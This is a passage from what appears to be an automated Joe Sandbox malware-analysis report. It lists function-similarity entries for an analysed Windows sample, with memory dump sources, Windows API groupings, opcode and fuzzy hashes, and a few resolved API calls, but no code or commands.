                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                        • String ID:
                                                                        • API String ID: 2832842796-0
                                                                        • Opcode ID: a01b0d5fbe9a32fe62c4333acd091835815607779ec9283ab20b334688ab3a66
                                                                        • Instruction ID: 507c127e374a673de614bcd7b53464dfe3ab0cd6b86e646f4562c9b789c3042f
                                                                        • Opcode Fuzzy Hash: a01b0d5fbe9a32fe62c4333acd091835815607779ec9283ab20b334688ab3a66
                                                                        • Instruction Fuzzy Hash: 2051FA26A18A8682DB14DF2AE49056D7760FB89F98F148432EF8E87776CF3CE544C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc
                                                                        • String ID:
                                                                        • API String ID: 190572456-0
                                                                        • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                        • Instruction ID: f0b39d0b027edb7aeb7c8d8dca9290cf031a50539f6ad9959bed4561f61fbb7c
                                                                        • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                        • Instruction Fuzzy Hash: 5941E421B09A4681FE158F1EAA146BA6395BF4CBD8F498535DF5DCB3A8EF7CE4008304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable
                                                                        • String ID:
                                                                        • API String ID: 2939132127-0
                                                                        • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                        • Instruction ID: 0975d71fd6427bf13ed9b46765fc2c722a97562ef6a4027b75b7e80806c9aab6
                                                                        • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                        • Instruction Fuzzy Hash: 0851633294978A89EB658B1DE4686783764FB8DB88F284536CB4DC73B0CE3EE441D710
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: eede7ce4c4e84a454966b5ad3a71d2882c358ebf9f1b03269eaebc827b2ba57d
                                                                        • Instruction ID: 01b3267c4e0477d66a384d8ec64441a844bd1a489c5357f02eaae571a9e5417b
                                                                        • Opcode Fuzzy Hash: eede7ce4c4e84a454966b5ad3a71d2882c358ebf9f1b03269eaebc827b2ba57d
                                                                        • Instruction Fuzzy Hash: 78319036A0875586E710CF6DE84826973A1F78CBA8F510235EF9AC77A9CE3CE8458750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                        • String ID:
                                                                        • API String ID: 2256411358-0
                                                                        • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                        • Instruction ID: df4cee9db92bf85b411819e2845f8db2f50dbc5c3ed77cc86d86c073dcdb266c
                                                                        • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                        • Instruction Fuzzy Hash: 58414A21D1C69286FBA58B2CE58577A6690FF48B4CF180135D76DC61B9CE3DF4898B01
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                        • String ID:
                                                                        • API String ID: 2655805287-0
                                                                        • Opcode ID: 9bd73521170ee007c9171dd1e9261bc07268575bcf825c08a7990efda1f67af7
                                                                        • Instruction ID: 7d3f623596ef1c2e5d5d87f9210ee460ec2d5a7437c2bb4ce65fd16350000fb8
                                                                        • Opcode Fuzzy Hash: 9bd73521170ee007c9171dd1e9261bc07268575bcf825c08a7990efda1f67af7
                                                                        • Instruction Fuzzy Hash: A121E522B0968246EB148B1AA9152756690BF8DFE8F444530EF5EC77A1DE3CE4518700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                        • Instruction ID: 9b07bfc7e1b4a8dda801f46e37a1346f8dad69b268a3e899622ded9cdc81a4f2
                                                                        • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                        • Instruction Fuzzy Hash: 51218E22B08A4186EB14DF2BE8840ADA7A1FB8DF98B184035DF0DC7B65DE38D8468740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                        • Instruction ID: 3918cd75bd0ac3f8f98ae42a84c62b52635ea3e741d60e2347f82bf2c2ff3c15
                                                                        • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                        • Instruction Fuzzy Hash: 49314B32918B528AE7448F0AE95133A7BA1FB8DB98F580135DB4987774CF7DE446CB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 2067211477-0
                                                                        • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                        • Instruction ID: 5fd59d451b69d301ad8ed6818b01ac314b907c9e9f14d335f167c8d5ab1245c3
                                                                        • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                        • Instruction Fuzzy Hash: 4E216225A0D78286EE56DF69E4601796390BF8CB88F484531DF4D87775DF3CE814C614
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _set_statfp
                                                                        • String ID:
                                                                        • API String ID: 1156100317-0
                                                                        • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                        • Instruction ID: 91276a3315b1a022c86eb8e945e5ae58477f9fd0f5f8e4d1ffc854a947779b9a
                                                                        • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                        • Instruction Fuzzy Hash: C711A926E1D60349FA54253DE44637513417F5D3B8F154635EF7EC66FA8F5CA840810E
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                        • String ID:
                                                                        • API String ID: 2117695475-0
                                                                        • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                        • Instruction ID: d12637189189c5ad60eff386669ee6748f76c08366d90ac1fb53dad75a8ba08a
                                                                        • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                        • Instruction Fuzzy Hash: 2C11D001E1D54745FA1477FC94662BC1281BF5C30DFA4043AEB1DEA2F3EE1CB4458A2A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                        • Instruction ID: f2144cce6a817555987026f1bac8ee6bb304a7cbc089b0feb35e755c29fb91f7
                                                                        • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                        • Instruction Fuzzy Hash: 17113336A44B82C6E7108F5AF840569B7B4FB88B88B198436DF8983B64DF78E8558740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                        • Instruction ID: 4855f2ffb2ddb865e1def6e6ebf454c57425abf4e6d9f9fd9692f933cec17bfe
                                                                        • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                        • Instruction Fuzzy Hash: 75113336604B82C6E7108F1AF840569B7B4FB88BD8B598536DF8883B64EF78E8558740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                        • Instruction ID: 55f8ee2b8c235a783a7f93513b7889651b9ea4be9f69367f069b54748f489a79
                                                                        • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                        • Instruction Fuzzy Hash: AE111E26A18B4286E7548B2AF85032A63A4FF89FC9F188535DF4DC77A8DF3DD4458700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                        • Instruction ID: a96036fb48d37874b4da81ed3b7e598ccb4c73d12c614a5e9028d29717378e57
                                                                        • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                        • Instruction Fuzzy Hash: BE116562A0898681EB659F28F4543792360FF8CB4CF444031DB8D862B9DF7CD58AC750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                        • Instruction ID: 1d2507472bd276b1a00991544522cea18d2e300a11bab4bb58688e86aec53898
                                                                        • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                        • Instruction Fuzzy Hash: 76018421A18A4282EB058B3DF49513D9361BF9D789B644235E34FD2972DF2DE496C600
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00007FF6BB1829AD,?,?,?,00007FF6BB132AB2), ref: 00007FF6BB1A003C
                                                                        • TerminateThread.KERNEL32(?,?,?,00007FF6BB1829AD,?,?,?,00007FF6BB132AB2), ref: 00007FF6BB1A0047
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,00007FF6BB1829AD,?,?,?,00007FF6BB132AB2), ref: 00007FF6BB1A0055
                                                                        • ~SyncLockT.VCCORLIB ref: 00007FF6BB1A005E
                                                                          • Part of subcall function 00007FF6BB19F7B8: CloseHandle.KERNEL32(?,?,?,00007FF6BB1A0063,?,?,?,00007FF6BB1829AD,?,?,?,00007FF6BB132AB2), ref: 00007FF6BB19F7C9
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00007FF6BB1829AD,?,?,?,00007FF6BB132AB2), ref: 00007FF6BB1A006A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3142591903-0
                                                                        • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                        • Instruction ID: 82d1d66c8fbb844a41a974fef2db764a4e795efdc88119f8f4738ca454236233
                                                                        • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                        • Instruction Fuzzy Hash: 2401E23AA18A4196E7509F59F48422A7364FB88B98F144035DB8E83BA5DF3CE896C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorExitLastThread
                                                                        • String ID:
                                                                        • API String ID: 1611280651-0
                                                                        • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                        • Instruction ID: 1c507e168ba08d05cfe8f023bd769a47ea9576349a1e17051e4320dffa865353
                                                                        • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                        • Instruction Fuzzy Hash: AF014F21B0864692FA055B28E45817C2261FF48B79FA05734C73E826F5DF3CE8688304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                        • String ID:
                                                                        • API String ID: 179993514-0
